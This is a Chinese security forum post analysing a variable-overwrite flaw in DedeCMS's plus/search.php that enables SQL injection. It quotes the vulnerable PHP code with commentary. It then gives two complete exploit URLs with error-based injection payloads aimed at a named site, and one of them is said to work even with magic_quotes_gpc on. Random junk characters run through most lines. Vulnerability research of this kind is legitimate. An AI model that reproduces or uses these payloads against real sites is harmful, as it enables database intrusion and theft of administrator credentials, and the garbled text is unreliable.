微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.2 c" x; {) w, X8 N1 d
作者: c4rp3nt3r@0x50sec.org
; x G3 e$ G" x* n" N2 p' _" f2 `Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.4 y L' w/ c! ?/ j4 ?" `
! u( q, n6 m2 Y2 q+ b黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.0 v0 V" G6 o6 |
+ |- ~ ^ a3 J ~: g
============
) K/ Y7 q$ ~1 }! e8 V6 I
$ h; P0 O% d2 B' E w- V
# t- G7 s8 T: Q$ y- \9 n# ?$ q. ~+ wDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
+ L t4 Q$ E/ Y0 |( g7 y+ v$ q i
* g! M2 d" A$ @1 Rrequire_once(dirname(__FILE__).”/../include/common.inc.php”);
* ~+ T8 {3 ^ M2 srequire_once(DEDEINC.”/arc.searchview.class.php”);
& M5 A6 n. g7 U1 ` 6 V% u: {/ h% u* M3 e( B
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;9 R0 i% A* R6 ~# o* i- Q- Z
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
' D1 z& I; y+ O: t$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;# H; G( s+ A8 L
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;' a2 c5 N, n! u- |, H2 ?0 I8 S x/ X
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;+ @7 `. K2 |% N9 B! v; ]* ]
/ c, c5 u8 u) }" J! jif(!isset($orderby)) $orderby=”;
6 }+ }1 d+ B- L0 _0 Delse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
# ]! \7 P7 k% Q% P
/ o' c. [3 Y+ Z# p7 }1 y " i9 ^1 U! \- b( J, m8 a6 M) h
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
% i2 r0 V' m& ]0 z8 L0 c }else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
; p) d5 a7 G- L# X
8 i& I9 o" _* i# Wif(!isset($keyword)){
0 f/ ]$ F8 q5 |8 _ if(!isset($q)) $q = ”;* ~ l- O2 W* t) `$ U9 l+ c3 [
$keyword=$q;
: G! d W/ R) w5 ^}
' x( H) B# {: k, x) Q8 E
! u7 f- ^% D5 |7 f% |7 s8 j$oldkeyword = $keyword = FilterSearch(stripslashes($keyword)); V! |- O9 n( m
2 }1 y2 ]/ J2 g5 i( A: e
//查找栏目信息5 K) y( R6 z$ [" [$ A
if(empty($typeid))8 ?. J& o# b! G5 d
{/ A- P( F p% l6 t$ r6 \1 |" w
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;+ O( m3 h4 l5 P( h$ g, p7 ?
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
; t1 B/ P* v" E6 {* Y/ Q& x {
$ d1 s1 w% e E $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);$ n% F/ w% X u C: V0 D, j5 O2 |
fwrite($fp, “<”.”?php\r\n”);( _ M9 J3 m* a3 }( d1 A
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);: r, _3 [+ _4 s! n! W. X
$dsql->Execute();- H' }: W. Y* v" t0 h0 i" M
while($row = $dsql->GetArray()). G9 Y4 S. B0 }# J0 X$ k8 S
{
$ _+ ]+ d ` n& P; r; `- e fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);# g) n# l1 ^+ [; t+ R0 [/ b
}
" j8 x$ V A2 v1 L$ Y v! n0 }, l. { fwrite($fp, ‘?’.'>’);: y$ W, f2 S7 M3 Y# @
fclose($fp);
: F+ z5 O. _; { }0 ^/ B6 }: g6 j/ ^: {+ q
//引入栏目缓存并看关键字是否有相关栏目内容) l4 Z1 _- _ c5 e# @
require_once($typenameCacheFile);
* b0 i6 q1 e! A: b//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个4 ~3 z4 l; ]# d/ [- R7 Y/ p
//# E% u4 p# W( V# h
if(isset($typeArr) && is_array($typeArr))- x5 X( V# Q- C# `* C8 ^
{
. c3 J* {# y1 `6 y5 }0 I foreach($typeArr as $id=>$typename)
0 c; V" [: D: y- Y, {2 l8 B) P {- U: q8 p+ K$ E. X
* d7 h2 P3 u1 A( |8 ?- Z <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过" P4 j. Q7 n7 G( S2 J5 o; N h
if($keyword != $keywordn)
( U0 F1 l8 q+ Z7 y) ~% }3 d$ U {
* g. y' _; e# k# y+ e/ ~ $keyword = $keywordn;
2 F& T" x( d a8 a <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设/ C8 q4 c; [7 @; S, ?, f! {8 U
break;
. [1 j- S4 G1 k7 M* u7 T7 D }* k0 X L @2 j
}+ r$ q' b: [2 u( e( s1 i& h/ G
}
! g& B* T6 j; O m- e) ]}6 l- ]7 [6 c* ~1 k+ _/ ]8 U# {! K+ s
然后plus/search.php文件下面定义了一个 Search类的对象 .
- H' [: m# M. g5 ^6 C3 Y m在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
6 U/ ^/ A& c9 J4 T8 X$this->TypeLink = new TypeLink($typeid);
2 u8 Z7 f/ q: D7 n8 m/ j; [ 8 ^( ~. ] X O' V! R& ~4 R/ C5 H
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.+ z5 D0 Y8 V; }& H t
4 @" G! V' u$ j+ y! x. s1 ^class TypeLink
& f1 n& W% J5 [* \{
% Q- E @0 [8 b1 _ e% W" S, x var $typeDir;) M: s4 v& G0 h, v2 z4 ]+ e. ~+ T8 R
var $dsql;
, p1 ~* F( W; t% W6 K var $TypeID;- z! [- {3 [( T$ b2 m
var $baseDir;4 n" Y9 x/ ~$ j( Q
var $modDir;
, x1 }2 r- g C: M* p0 x. g7 g0 [8 ^ var $indexUrl;
& B/ j- r1 R3 l. d: s2 _' m var $indexName;" u4 H# h& H# H, e& B( p
var $TypeInfos;
- z& I! {7 g* q+ O, A4 p( t+ b: } var $SplitSymbol;5 s I V9 w+ ~0 u, F9 g5 Z3 |
var $valuePosition;
" B( k, m& t" d7 J- {" l var $valuePositionName;
) W! V6 f7 b" L. Z. P7 T var $OptionArrayList;//构造函数///////
3 R9 b6 z, @. Z( C2 L) I //php5构造函数2 T2 y% Y% {3 p4 k. i; A# q8 ~% L
function __construct($typeid)
" q1 E0 r, c0 R' R9 X1 V' E {
; z( D4 }3 ]# |( _( M# c7 Y $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];. G, n0 z$ u5 e* b
$this->indexName = $GLOBALS['cfg_indexname'];2 ~4 U! g ~" J3 L# j7 e
$this->baseDir = $GLOBALS['cfg_basedir'];5 e5 m9 F; w/ e x
$this->modDir = $GLOBALS['cfg_templets_dir'];
5 A" F7 \7 \( P $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
! _) \9 j( A9 }- @ $this->dsql = $GLOBALS['dsql'];; t1 S1 j, B* u1 K; B5 j& \$ V
$this->TypeID = $typeid;5 a5 H8 _ o. Z: G! G( {% f
$this->valuePosition = ”;
; U7 R" i, ^8 e9 B0 w3 [* P $this->valuePositionName = ”;: @# r0 E S6 u- a k8 \6 X0 V
$this->typeDir = ”;
( n* H% E" d" u$ a+ ?9 ~ $this->OptionArrayList = ”;, S5 |0 K7 |0 |( q
. V3 G; S* ?* B: k6 z. i, G
//载入类目信息
: b! D/ M6 O% y8 U
9 H+ \* P1 ]6 |( X) n, T" f4 g <font color=”Red”>$query = “SELECT tp.*,ch.typename as$ p! g) g: |9 |: I+ I
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join+ V% j1 ~! a, ?) x
`#@__channeltype` ch+ G, J& X+ ]* E' ^1 q5 j4 L
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
" I6 O& F4 B& L) H, ^
& A7 V, G% ~0 I if($typeid > 0)% m7 k3 E( f2 G* n# U" r6 Y
{. o* t. b- f% I1 Y7 C3 |- n
$this->TypeInfos = $this->dsql->GetOne($query);
) W% B; l# ?6 l4 ~/ l6 O/ M L( m. i利用代码一 需要 即使magic_quotes_gpc = Off
$ U) ?% a7 q; u4 @0 s: l) E 4 h6 B3 m; e6 B. j: {
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
# q% C6 [9 F7 b) J + Q/ H( v( c! F/ t. ]
这只是其中一个利用代码… Search 类的构造函数再往下; Z& y* w4 B3 u1 k
) K) k2 F% T( m7 A* {! S……省略
. P' F4 W' O# F; r$this->TypeID = $typeid;
' M5 t& Y* `7 x& c……省略, k9 [1 x2 w) Q3 l2 ?+ k. e
if($this->TypeID==”0″){1 O0 I* X$ `, l5 X4 D. e
$this->ChannelTypeid=1;9 |* H0 M; }" o; M6 Q2 l' o
}else{, K9 r4 M) C1 W D) {* F p
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
/ D+ [$ y ~4 {2 w A//现在不鸡肋了吧亲…1 p+ Y% Z5 B5 k9 c- K) p
$this->ChannelTypeid=$row['channeltype'];( D* J7 }8 n" l0 h
3 w7 l9 }( w: w* D/ j: i% N0 s
}. ^( k5 R3 c6 g
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
' L; y- f! _# }) A# R
+ Y; O5 D8 m3 X+ twww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
7 G4 K5 |' ~7 \8 @5 \ 8 _0 n& m/ b& {3 q: P4 ]' ]& h
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
8 v% \; B3 o S3 \ h7 R) Q" ?1 D |
发表于 2013-1-19 08:18:56
收藏
支持
反对